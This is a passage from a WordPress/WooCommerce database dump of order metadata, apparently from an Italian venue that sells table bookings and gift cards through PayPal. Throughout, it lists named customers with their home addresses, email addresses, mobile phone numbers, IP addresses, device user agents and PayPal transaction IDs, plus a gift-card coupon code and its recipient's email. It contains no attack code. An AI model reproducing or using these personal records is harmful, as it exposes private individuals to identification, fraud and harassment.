attached','[]'),(8971,579,'Payer PayPal address','marcocastellani000@gmail.com'),(8972,579,'Payer first name','Marco'),(8973,579,'Payer last name','Castellani'),(8974,579,'Payment type','instant'),(8975,579,'_paypal_status','completed'),(8976,579,'_download_permissions_granted','yes'),(8977,579,'_recorded_sales','yes'),(8978,579,'_recorded_coupon_usage_counts','yes'),(8979,579,'_order_stock_reduced','yes'),(8980,579,'PayPal Transaction Fee','6.47'),(8981,580,'_order_key','wc_order_5a43c451c43a2'),(8982,580,'_customer_user','0'),(8983,580,'_payment_method','paypal'),(8984,580,'_payment_method_title','PayPal'),(8985,580,'_transaction_id','7N955604S0685800T'),(8986,580,'_customer_ip_address','87.26.33.168'),(8987,580,'_customer_user_agent','mozilla/5.0 (linux; android 4.4.2; gt-i9195 build/kot49h) applewebkit/537.36 (khtml, like gecko) chrome/60.0.3112.116 mobile safari/537.36'),(8988,580,'_created_via','checkout'),(8989,580,'_date_completed',''),(8990,580,'_completed_date',''),(8991,580,'_date_paid','1514391484'),(8992,580,'_paid_date','2017-12-27 17:18:04'),(8993,580,'_cart_hash','b56eb20833ec77529fffb0d45846124d'),(8994,580,'_billing_first_name','Bompani Giulia'),(8995,580,'_billing_last_name','Bompani'),(8996,580,'_billing_company',''),(8997,580,'_billing_address_1','Via Cesare Zavattini,8'),(8998,580,'_billing_address_2',''),(8999,580,'_billing_city','Correggio'),(9000,580,'_billing_state',''),(9001,580,'_billing_postcode',''),(9002,580,'_billing_country',''),(9003,580,'_billing_email','giuli84@hotmail.it'),(9004,580,'_billing_phone','3332822191'),(9005,580,'_shipping_first_name',''),(9006,580,'_shipping_last_name',''),(9007,580,'_shipping_company',''),(9008,580,'_shipping_address_1',''),(9009,580,'_shipping_address_2',''),(9010,580,'_shipping_city',''),(9011,580,'_shipping_state',''),(9012,580,'_shipping_postcode',''),(9013,580,'_shipping_country',''),(9014,580,'_order_currency','EUR'),(9015,580,'_cart_discount','0'),(9016,580,'_cart_discount_tax','0'),(9017,580,'_order_shipping','0.00'),(9018,580,'_order_shipping_tax','0'),(9019,580,'_order_tax','0'),(9020,580,'_order_total','120.00'),(9021,580,'_order_version','3.2.6'),(9022,580,'_prices_include_tax','no'),(9023,580,'_billing_address_index','Bompani Giulia Bompani  Via Cesare Zavattini,8  Correggio    giuli84@hotmail.it 3332822191'),(9024,580,'_shipping_address_index','        '),(9025,580,'Indicare in caso di prenotazione tavolo. Quanti adulti?','4'),(9026,580,'Numero bambini fino a 6 anni','0'),(9027,580,'Numero ragazzi fino a 13 anni','0'),(9028,580,'Files attached','[]'),(9029,580,'Payer PayPal address','giuli84@hotmail.it'),(9030,580,'Payer first name','Bompani Giulia'),(9031,580,'Payer last name','Bompani'),(9032,580,'Payment type','instant'),(9033,580,'_paypal_status','completed'),(9034,580,'_download_permissions_granted','yes'),(9035,580,'_recorded_sales','yes'),(9036,580,'_recorded_coupon_usage_counts','yes'),(9037,580,'_order_stock_reduced','yes'),(9038,580,'PayPal Transaction Fee','4.43'),(9039,581,'_order_currency','EUR'),(9040,581,'_cart_discount','0'),(9041,581,'_cart_discount_tax','0'),(9042,581,'_order_shipping','0'),(9043,581,'_order_shipping_tax','0'),(9044,581,'_order_tax','0'),(9045,581,'_order_total','-60.00'),(9046,581,'_order_version','3.2.6'),(9047,581,'_prices_include_tax','no'),(9048,581,'_refund_amount','60'),(9049,581,'_refunded_by','1'),(9050,581,'_refund_reason','Ordine completamente rimborsato'),(9051,582,'_order_key','wc_order_5a461817aab3e'),(9052,582,'_customer_user','0'),(9053,582,'_payment_method','paypal'),(9054,582,'_payment_method_title','PayPal'),(9055,582,'_transaction_id','2MB93042CE171462E'),(9056,582,'_customer_ip_address','2.236.73.42'),(9057,582,'_customer_user_agent','mozilla/5.0 (linux; android 7.0; huawei vns-l31 build/huaweivns-l31) applewebkit/537.36 (khtml, like gecko) chrome/63.0.3239.111 mobile safari/537.36'),(9058,582,'_created_via','checkout'),(9059,582,'_date_completed',''),(9060,582,'_completed_date',''),(9061,582,'_date_paid','1514543192'),(9062,582,'_paid_date','2017-12-29 11:26:32'),(9063,582,'_cart_hash','65481bc1f20c5eb33de0938c007f3d46'),(9064,582,'_billing_first_name','Andrea'),(9065,582,'_billing_last_name','Puccini'),(9066,582,'_billing_company',''),(9067,582,'_billing_address_1','Via Delle Eriche 46'),(9068,582,'_billing_address_2',''),(9069,582,'_billing_city','San Miniato loc.Ponte a Elsa'),(9070,582,'_billing_state',''),(9071,582,'_billing_postcode',''),(9072,582,'_billing_country',''),(9073,582,'_billing_email','andrea.79.puccini@gmail.com'),(9074,582,'_billing_phone','3471852834'),(9075,582,'_shipping_first_name',''),(9076,582,'_shipping_last_name',''),(9077,582,'_shipping_company',''),(9078,582,'_shipping_address_1',''),(9079,582,'_shipping_address_2',''),(9080,582,'_shipping_city',''),(9081,582,'_shipping_state',''),(9082,582,'_shipping_postcode',''),(9083,582,'_shipping_country',''),(9084,582,'_order_currency','EUR'),(9085,582,'_cart_discount','0'),(9086,582,'_cart_discount_tax','0'),(9087,582,'_order_shipping','0.00'),(9088,582,'_order_shipping_tax','0'),(9089,582,'_order_tax','0'),(9090,582,'_order_total','180.00'),(9091,582,'_order_version','3.2.6'),(9092,582,'_prices_include_tax','no'),(9093,582,'_billing_address_index','Andrea Puccini  Via Delle Eriche 46  San Miniato loc.Ponte a Elsa    andrea.79.puccini@gmail.com 3471852834'),(9094,582,'_shipping_address_index','        '),(9095,582,'Indicare in caso di prenotazione tavolo. Quanti adulti?','4'),(9096,582,'Numero bambini fino a 6 anni','2'),(9097,582,'Numero ragazzi fino a 13 anni','0'),(9098,582,'Files attached','[]'),(9099,582,'Payer PayPal address','andrea.79.puccini@gmail.com'),(9100,582,'Payer first name','Andrea'),(9101,582,'Payer last name','Puccini'),(9102,582,'Payment type','instant'),(9103,582,'_paypal_status','completed'),(9104,582,'_download_permissions_granted','yes'),(9105,582,'_recorded_sales','yes'),(9106,582,'_recorded_coupon_usage_counts','yes'),(9107,582,'_order_stock_reduced','yes'),(9108,582,'PayPal Transaction Fee','6.47'),(9109,583,'_order_key','wc_order_5a47711962886'),(9110,583,'_customer_user','0'),(9111,583,'_payment_method','paypal'),(9112,583,'_payment_method_title','PayPal'),(9113,583,'_transaction_id','74Y07537JL012052E'),(9114,583,'_customer_ip_address','93.39.15.232'),(9115,583,'_customer_user_agent','mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/63.0.3239.84 safari/537.36'),(9116,583,'_created_via','checkout'),(9117,583,'_date_completed',''),(9118,583,'_completed_date',''),(9119,583,'_date_paid','1514631563'),(9120,583,'_paid_date','2017-12-30 11:59:23'),(9121,583,'_cart_hash','651e0c6820a5a7b5617423c8c4d7de56'),(9122,583,'_billing_first_name','Davide'),(9123,583,'_billing_last_name','Bartoli'),(9124,583,'_billing_company',''),(9125,583,'_billing_address_1','via gobetti 1'),(9126,583,'_billing_address_2',''),(9127,583,'_billing_city','novellara'),(9128,583,'_billing_state',''),(9129,583,'_billing_postcode',''),(9130,583,'_billing_country',''),(9131,583,'_billing_email','db050183@gmail.com'),(9132,583,'_billing_phone','3341198916'),(9133,583,'_shipping_first_name',''),(9134,583,'_shipping_last_name',''),(9135,583,'_shipping_company',''),(9136,583,'_shipping_address_1',''),(9137,583,'_shipping_address_2',''),(9138,583,'_shipping_city',''),(9139,583,'_shipping_state',''),(9140,583,'_shipping_postcode',''),(9141,583,'_shipping_country',''),(9142,583,'_order_currency','EUR'),(9143,583,'_cart_discount','0'),(9144,583,'_cart_discount_tax','0'),(9145,583,'_order_shipping','0.00'),(9146,583,'_order_shipping_tax','0'),(9147,583,'_order_tax','0'),(9148,583,'_order_total','60.00'),(9149,583,'_order_version','3.2.6'),(9150,583,'_prices_include_tax','no'),(9151,583,'_billing_address_index','Davide Bartoli  via gobetti 1  novellara    db050183@gmail.com 3341198916'),(9152,583,'_shipping_address_index','        '),(9153,583,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(9154,583,'Numero bambini fino a 6 anni','0'),(9155,583,'Numero ragazzi fino a 13 anni','0'),(9156,583,'Files attached','[]'),(9157,583,'Payer PayPal address','db050183@gmail.com'),(9158,583,'Payer first name','Davide'),(9159,583,'Payer last name','Bartoli'),(9160,583,'Payment type','instant'),(9161,583,'_paypal_status','completed'),(9162,583,'_download_permissions_granted','yes'),(9163,583,'_recorded_sales','yes'),(9164,583,'_recorded_coupon_usage_counts','yes'),(9165,583,'_order_stock_reduced','yes'),(9166,583,'PayPal Transaction Fee','2.39'),(9167,584,'_order_key','wc_order_5a57ca4a09fe5'),(9168,584,'_customer_user','0'),(9169,584,'_payment_method','paypal'),(9170,584,'_payment_method_title','PayPal'),(9171,584,'_transaction_id',''),(9172,584,'_customer_ip_address','151.36.154.83'),(9173,584,'_customer_user_agent','mozilla/5.0 (iphone; cpu iphone os 11_2_2 like mac os x) applewebkit/604.4.7 (khtml, like gecko) version/11.0 mobile/15c202 safari/604.1'),(9174,584,'_created_via','checkout'),(9175,584,'_date_completed',''),(9176,584,'_completed_date',''),(9177,584,'_date_paid',''),(9178,584,'_paid_date',''),(9179,584,'_cart_hash','9a8e746a1d56f59cfe541f8783906621'),(9180,584,'_billing_first_name','Marica'),(9181,584,'_billing_last_name','Felici'),(9182,584,'_billing_company',''),(9183,584,'_billing_address_1','Via tavullia 10a/2'),(9184,584,'_billing_address_2',''),(9185,584,'_billing_city','Gradara'),(9186,584,'_billing_state',''),(9187,584,'_billing_postcode',''),(9188,584,'_billing_country',''),(9189,584,'_billing_email','Marica.felici@virgilio.it'),(9190,584,'_billing_phone','3396000675'),(9191,584,'_shipping_first_name',''),(9192,584,'_shipping_last_name',''),(9193,584,'_shipping_company',''),(9194,584,'_shipping_address_1',''),(9195,584,'_shipping_address_2',''),(9196,584,'_shipping_city',''),(9197,584,'_shipping_state',''),(9198,584,'_shipping_postcode',''),(9199,584,'_shipping_country',''),(9200,584,'_order_currency','EUR'),(9201,584,'_cart_discount','0'),(9202,584,'_cart_discount_tax','0'),(9203,584,'_order_shipping','0.00'),(9204,584,'_order_shipping_tax','0'),(9205,584,'_order_tax','0'),(9206,584,'_order_total','120.00'),(9207,584,'_order_version','3.2.6'),(9208,584,'_prices_include_tax','no'),(9209,584,'_billing_address_index','Marica Felici  Via tavullia 10a/2  Gradara    Marica.felici@virgilio.it 3396000675'),(9210,584,'_shipping_address_index','        '),(9211,584,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(9212,584,'Numero bambini fino a 6 anni','0'),(9213,584,'Numero ragazzi fino a 13 anni','0'),(9214,584,'Files attached','[]'),(9215,585,'_order_key','wc_order_5a57cf982f4c5'),(9216,585,'_customer_user','0'),(9217,585,'_payment_method','paypal'),(9218,585,'_payment_method_title','PayPal'),(9219,585,'_transaction_id','774911327V0231138'),(9220,585,'_customer_ip_address','151.38.122.233'),(9221,585,'_customer_user_agent','mozilla/5.0 (iphone; cpu iphone os 11_2_2 like mac os x) applewebkit/604.4.7 (khtml, like gecko) version/11.0 mobile/15c202 safari/604.1'),(9222,585,'_created_via','checkout'),(9223,585,'_date_completed',''),(9224,585,'_completed_date',''),(9225,585,'_date_paid','1515704251'),(9226,585,'_paid_date','2018-01-11 21:57:31'),(9227,585,'_cart_hash','9b8c55de1cc669c81d33588fbd7b37bf'),(9228,585,'_billing_first_name','Marica'),(9229,585,'_billing_last_name','Felici'),(9230,585,'_billing_company',''),(9231,585,'_billing_address_1','Via tavullia 10a/2'),(9232,585,'_billing_address_2',''),(9233,585,'_billing_city','Gradara'),(9234,585,'_billing_state',''),(9235,585,'_billing_postcode',''),(9236,585,'_billing_country',''),(9237,585,'_billing_email','Marica.felici@virgilio.it'),(9238,585,'_billing_phone','3396000675'),(9239,585,'_shipping_first_name',''),(9240,585,'_shipping_last_name',''),(9241,585,'_shipping_company',''),(9242,585,'_shipping_address_1',''),(9243,585,'_shipping_address_2',''),(9244,585,'_shipping_city',''),(9245,585,'_shipping_state',''),(9246,585,'_shipping_postcode',''),(9247,585,'_shipping_country',''),(9248,585,'_order_currency','EUR'),(9249,585,'_cart_discount','0'),(9250,585,'_cart_discount_tax','0'),(9251,585,'_order_shipping','0.00'),(9252,585,'_order_shipping_tax','0'),(9253,585,'_order_tax','0'),(9254,585,'_order_total','120.00'),(9255,585,'_order_version','3.2.6'),(9256,585,'_prices_include_tax','no'),(9257,585,'_billing_address_index','Marica Felici  Via tavullia 10a/2  Gradara    Marica.felici@virgilio.it 3396000675'),(9258,585,'_shipping_address_index','        '),(9259,585,'Indicare in caso di prenotazione tavolo. Quanti adulti?','1'),(9260,585,'Numero bambini fino a 6 anni','0'),(9261,585,'Numero ragazzi fino a 13 anni','0'),(9262,585,'Files attached','[]'),(9263,585,'Payer PayPal address','marica.felici@virgilio.it'),(9264,585,'Payer first name','Marica'),(9265,585,'Payer last name','Felici'),(9266,585,'Payment type','instant'),(9267,585,'_paypal_status','completed'),(9268,585,'_download_permissions_granted','yes'),(9269,585,'_recorded_sales','yes'),(9270,585,'_recorded_coupon_usage_counts','yes'),(9271,586,'discount_type','fixed_cart'),(9272,586,'coupon_amount','120'),(9273,586,'individual_use','no'),(9274,586,'usage_limit','1'),(9275,586,'expiry_date','2018-07-10'),(9276,586,'apply_before_tax','no'),(9277,586,'free_shipping','no'),(9278,586,'minimum_amount',''),(9279,586,'maximum_amount',''),(9280,586,'exclude_sale_items','no'),(9281,586,'exclude_product_ids',''),(9282,586,'exclude_product_categories',''),(9283,586,'mwb_wgm_giftcard_coupon','585'),(9284,586,'mwb_wgm_giftcard_coupon_unique','online'),(9285,586,'mwb_wgm_giftcard_coupon_product_id','472'),(9286,586,'mwb_wgm_giftcard_coupon_mail_to','Siri.siri@libero.it'),(9287,585,'585#154','solymarcouponPFCCD'),(9288,585,'mwb_wgm_order_giftcard','send'),(9289,585,'_order_stock_reduced','yes'),(9290,585,'PayPal Transaction Fee','4.43'),(9291,589,'_wp_attached_file','2017/02/sanvalentino.jpg'),(9292,589,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:4:\"file\";s:24:\"2017/02/sanvalentino.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:24:\"sanvalentino-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"sanvalentino-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:24:\"sanvalentino-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"sanvalentino-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"sanvalentino-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"sanvalentino-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"sanvalentino-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:24:\"sanvalentino-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:24:\"sanvalentino-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:24:\"sanvalentino-830x830.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:830;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:24:\"sanvalentino-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:24:\"sanvalentino-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:24:\"sanvalentino-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:24:\"sanvalentino-480x480.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9293,290,'_tax_status','taxable'),(9294,290,'_tax_class',''),(9295,290,'_default_attributes','a:0:{}'),(9296,290,'_download_limit','-1'),(9297,290,'_download_expiry','-1'),(9298,590,'_edit_lock','1549017232:1'),(9299,590,'_edit_last','1'),(9300,590,'_thumbnail_id','589'),(9301,590,'_wp_page_template','default'),(9304,590,'_yoast_wpseo_content_score','60'),(9305,590,'_yoast_wpseo_primary_category','1'),(9310,594,'_order_key','wc_order_5a6cd1851f075'),(9311,594,'_customer_user','0'),(9312,594,'_payment_method','paypal'),(9313,594,'_payment_method_title','PayPal'),(9314,594,'_transaction_id','1WN92854TT293130M'),(9315,594,'_customer_ip_address','79.55.21.148'),(9316,594,'_customer_user_agent','mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/63.0.3239.132 safari/537.36'),(9317,594,'_created_via','checkout'),(9318,594,'_date_completed',''),(9319,594,'_completed_date',''),(9320,594,'_date_paid','1517081009'),(9321,594,'_paid_date','2018-01-27 20:23:29'),(9322,594,'_cart_hash','ac4aee62915c7b0591a85a390c3d2f5c'),(9323,594,'_billing_first_name','Luca'),(9324,594,'_billing_last_name','Semprini'),(9325,594,'_billing_company',''),(9326,594,'_billing_address_1','Via Sant\'Andrea, 12'),(9327,594,'_billing_address_2',''),(9328,594,'_billing_city','Montescudo'),(9329,594,'_billing_state',''),(9330,594,'_billing_postcode',''),(9331,594,'_billing_country',''),(9332,594,'_billing_email','lucasemprini23@gmail.com'),(9333,594,'_billing_phone','3493660385'),(9334,594,'_shipping_first_name',''),(9335,594,'_shipping_last_name',''),(9336,594,'_shipping_company',''),(9337,594,'_shipping_address_1',''),(9338,594,'_shipping_address_2',''),(9339,594,'_shipping_city',''),(9340,594,'_shipping_state',''),(9341,594,'_shipping_postcode',''),(9342,594,'_shipping_country',''),(9343,594,'_order_currency','EUR'),(9344,594,'_cart_discount','0'),(9345,594,'_cart_discount_tax','0'),(9346,594,'_order_shipping','0.00'),(9347,594,'_order_shipping_tax','0'),(9348,594,'_order_tax','0'),(9349,594,'_order_total','60.00'),(9350,594,'_order_version','3.2.6'),(9351,594,'_prices_include_tax','no'),(9352,594,'_billing_address_index','Luca Semprini  Via Sant\'Andrea, 12  Montescudo    lucasemprini23@gmail.com 3493660385'),(9353,594,'_shipping_address_index','        '),(9354,594,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(9355,594,'Numero bambini fino a 6 anni','0'),(9356,594,'Numero ragazzi fino a 13 anni','0'),(9357,594,'Files attached','[]'),(9358,594,'Payer PayPal address','lucasemprini23@gmail.com'),(9359,594,'Payer first name','Luca'),(9360,594,'Payer last name','Semprini'),(9361,594,'Payment type','instant'),(9362,594,'_paypal_status','completed'),(9363,594,'_download_permissions_granted','yes'),(9364,594,'_recorded_sales','yes'),(9365,594,'_recorded_coupon_usage_counts','yes'),(9366,594,'_order_stock_reduced','yes'),(9367,594,'PayPal Transaction Fee','2.39'),(9368,595,'_order_key','wc_order_5a6f292b57417'),(9369,595,'_customer_user','18'),(9370,595,'_payment_method','paypal'),(9371,595,'_payment_method_title','PayPal'),(9372,595,'_transaction_id','1H886268JM413761A'),(9373,595,'_customer_ip_address','77.242.215.81'),(9374,595,'_customer_user_agent','mozilla/5.0 (windows nt 6.1; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/63.0.3239.132 safari/537.36'),(9375,595,'_created_via','checkout'),(9376,595,'_date_completed',''),(9377,595,'_completed_date',''),(9378,595,'_date_paid','1517234500'),(9379,595,'_paid_date','2018-01-29 15:01:40'),(9380,595,'_cart_hash','ac4aee62915c7b0591a85a390c3d2f5c'),(9381,595,'_billing_first_name','itamar'),(9382,595,'_billing_last_name','zanotti'),(9383,595,'_billing_company',''),(9384,595,'_billing_address_1','via del camerario 64'),(9385,595,'_billing_address_2',''),(9386,595,'_billing_city','falciano'),(9387,595,'_billing_state',''),(9388,595,'_billing_postcode',''),(9389,595,'_billing_country',''),(9390,595,'_billing_email','itamar.zanotti@icloud.com'),(9391,595,'_billing_phone','3382803929'),(9392,595,'_shipping_first_name',''),(9393,595,'_shipping_last_name',''),(9394,595,'_shipping_company',''),(9395,595,'_shipping_address_1',''),(9396,595,'_shipping_address_2',''),(9397,595,'_shipping_city',''),(9398,595,'_shipping_state',''),(9399,595,'_shipping_postcode',''),(9400,595,'_shipping_country',''),(9401,595,'_order_currency','EUR'),(9402,595,'_cart_discount','0'),(9403,595,'_cart_discount_tax','0'),(9404,595,'_order_shipping','0.00'),(9405,595,'_order_shipping_tax','0'),(9406,595,'_order_tax','0'),(9407,595,'_order_total','60.00'),(9408,595,'_order_version','3.2.6'),(9409,595,'_prices_include_tax','no'),(9410,595,'_billing_address_index','itamar zanotti  via del camerario 64  falciano    itamar.zanotti@icloud.com 3382803929'),(9411,595,'_shipping_address_index','        '),(9412,595,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(9413,595,'Numero bambini fino a 6 anni','0'),(9414,595,'Numero ragazzi fino a 13 anni','0'),(9415,595,'Files attached','[]'),(9416,595,'Payer PayPal address','orders@dbsracing.com'),(9417,595,'Payer first name','Stefano'),(9418,595,'Payer last name','Debiagi'),(9419,595,'Payment type','instant'),(9420,595,'_paypal_status','completed'),(9421,595,'_download_permissions_granted','yes'),(9422,595,'_recorded_sales','yes'),(9423,595,'_recorded_coupon_usage_counts','yes'),(9424,595,'_order_stock_reduced','yes'),(9425,595,'PayPal Transaction Fee','2.39'),(9426,596,'_order_key','wc_order_5a76231470c2c'),(9427,596,'_customer_user','0'),(9428,596,'_payment_method','paypal'),(9429,596,'_payment_method_title','PayPal'),(9430,596,'_transaction_id',''),(9431,596,'_customer_ip_address','5.102.1.138'),(9432,596,'_customer_user_agent','mozilla/5.0 (iphone; cpu iphone os 11_2_5 like mac os x) applewebkit/604.5.6 (khtml, like gecko) version/11.0 mobile/15d60 safari/604.1'),(9433,596,'_created_via','checkout'),(9434,596,'_date_completed',''),(9435,596,'_completed_date',''),(9436,596,'_date_paid',''),(9437,596,'_paid_date',''),(9438,596,'_cart_hash','58ffb12063bb473912f20c4016e963ea'),(9439,596,'_billing_first_name','Giorgia'),(9440,596,'_billing_last_name','Dondi'),(9441,596,'_billing_company',''),(9442,596,'_billing_address_1',''),(9443,596,'_billing_address_2',''),(9444,596,'_billing_city','Rimini'),(9445,596,'_billing_state',''),(9446,596,'_billing_postcode',''),(9447,596,'_billing_country',''),(9448,596,'_billing_email','gdondi@notariato.it'),(9449,596,'_billing_phone','3338715237'),(9450,596,'_shipping_first_name',''),(9451,596,'_shipping_last_name',''),(9452,596,'_shipping_company',''),(9453,596,'_shipping_address_1',''),(9454,596,'_shipping_address_2',''),(9455,596,'_shipping_city',''),(9456,596,'_shipping_state',''),(9457,596,'_shipping_postcode',''),(9458,596,'_shipping_country',''),(9459,596,'_order_currency','EUR'),(9460,596,'_cart_discount','0'),(9461,596,'_cart_discount_tax','0'),(9462,596,'_order_shipping','0.00'),(9463,596,'_order_shipping_tax','0'),(9464,596,'_order_tax','0'),(9465,596,'_order_total','120.00'),(9466,596,'_order_version','3.2.6'),(9467,596,'_prices_include_tax','no'),(9468,596,'_billing_address_index','Giorgia Dondi    Rimini    gdondi@notariato.it 3338715237'),(9469,596,'_shipping_address_index','        '),(9470,596,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(9471,596,'Numero bambini fino a 6 anni','1'),(9472,596,'Numero ragazzi fino a 13 anni','1'),(9473,596,'Files attached','[]'),(9474,597,'_order_key','wc_order_5a77443a895f2'),(9475,597,'_customer_user','0'),(9476,597,'_payment_method','paypal'),(9477,597,'_payment_method_title','PayPal'),(9478,597,'_transaction_id','06Y21470WB027712P'),(9479,597,'_customer_ip_address','5.90.26.212'),(9480,597,'_customer_user_agent','mozilla/5.0 (iphone; cpu iphone os 11_2_2 like mac os x) applewebkit/604.1.34 (khtml, like gecko) gsa/41.0.178428663 mobile/15c202 safari/604.1'),(9481,597,'_created_via','checkout'),(9482,597,'_date_completed',''),(9483,597,'_completed_date',''),(9484,597,'_date_paid','1517765825'),(9485,597,'_paid_date','2018-02-04 18:37:05'),(9486,597,'_cart_hash','ac4aee62915c7b0591a85a390c3d2f5c'),(9487,597,'_billing_first_name','Matteo'),(9488,597,'_billing_last_name','Sciuto'),(9489,597,'_billing_company',''),(9490,597,'_billing_address_1',''),(9491,597,'_billing_address_2',''),(9492,597,'_billing_city',''),(9493,597,'_billing_state',''),(9494,597,'_billing_postcode',''),(9495,597,'_billing_country',''),(9496,597,'_billing_email','matteo.sciuto.94@iclou.com'),(9497,597,'_billing_phone','3209020644'),(9498,597,'_shipping_first_name',''),(9499,597,'_shipping_last_name',''),(9500,597,'_shipping_company',''),(9501,597,'_shipping_address_1',''),(9502,597,'_shipping_address_2',''),(9503,597,'_shipping_city',''),(9504,597,'_shipping_state',''),(9505,597,'_shipping_postcode',''),(9506,597,'_shipping_country',''),(9507,597,'_order_currency','EUR'),(9508,597,'_cart_discount','0'),(9509,597,'_cart_discount_tax','0'),(9510,597,'_order_shipping','0.00'),(9511,597,'_order_shipping_tax','0'),(9512,597,'_order_tax','0'),(9513,597,'_order_total','60.00'),(9514,597,'_order_version','3.2.6'),(9515,597,'_prices_include_tax','no'),(9516,597,'_billing_address_index','Matteo Sciuto        matteo.sciuto.94@iclou.com 3209020644'),(9517,597,'_shipping_address_index','        '),(9518,597,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(9519,597,'Numero bambini fino a 6 anni','0'),(9520,597,'Numero ragazzi fino a 13 anni','0'),(9521,597,'Files attached','[]'),(9522,597,'Payer PayPal address','matteo.sciuto.94@icloud.com'),(9523,597,'Payer first name','Matteo'),(9524,597,'Payer last name','Sciuto'),(9525,597,'Payment type','instant'),(9526,597,'_paypal_status','completed'),(9527,597,'_download_permissions_granted','yes'),(9528,597,'_recorded_sales','yes'),(9529,597,'_recorded_coupon_usage_counts','yes'),(9530,597,'_order_stock_reduced','yes'),(9531,597,'PayPal Transaction Fee','2.39'),(9532,598,'_order_key','wc_order_5a79ec0b4577e'),(9533,598,'_customer_user','0'),(9534,598,'_payment_method','paypal'),(9535,598,'_payment_method_title','PayPal'),(9536,598,'_transaction_id',''),(9537,598,'_customer_ip_address','151.42.64.225'),(9538,598,'_customer_user_agent','mozilla/5.0 (ipad; cpu os 11_2_5 like mac os x) applewebkit/604.5.6 (khtml, like gecko) version/11.0 mobile/15d60 safari/604.1'),(9539,598,'_created_via','checkout'),(9540,598,'_date_completed',''),(9541,598,'_completed_date',''),(9542,598,'_date_paid',''),(9543,598,'_paid_date',''),(9544,598,'_cart_hash','ac4aee62915c7b0591a85a390c3d2f5c'),(9545,598,'_billing_first_name','Giancarlo'),(9546,598,'_billing_last_name','Opizzi'),(9547,598,'_billing_company',''),(9548,598,'_billing_address_1','Via F.lli Sintoni, 27/D'),(9549,598,'_billing_address_2',''),(9550,598,'_billing_city','Cesenatico'),(9551,598,'_billing_state',''),(9552,598,'_billing_postcode',''),(9553,598,'_billing_country',''),(9554,598,'_billing_email','giancarloopizzi957@gmail.com'),(9555,598,'_billing_phone','3487595407'),(9556,598,'_shipping_first_name',''),(9557,598,'_shipping_last_name',''),(9558,598,'_shipping_company',''),(9559,598,'_shipping_address_1',''),(9560,598,'_shipping_address_2',''),(9561,598,'_shipping_city',''),(9562,598,'_shipping_state',''),(9563,598,'_shipping_postcode',''),(9564,598,'_shipping_country',''),(9565,598,'_order_currency','EUR'),(9566,598,'_cart_discount','0'),(9567,598,'_cart_discount_tax','0'),(9568,598,'_order_shipping','0.00'),(9569,598,'_order_shipping_tax','0'),(9570,598,'_order_tax','0'),(9571,598,'_order_total','60.00'),(9572,598,'_order_version','3.2.6'),(9573,598,'_prices_include_tax','no'),(9574,598,'_billing_address_index','Giancarlo Opizzi  Via F.lli Sintoni, 27/D  Cesenatico    giancarloopizzi957@gmail.com 3487595407'),(9575,598,'_shipping_address_index','        '),(9576,598,'Indicare in caso di 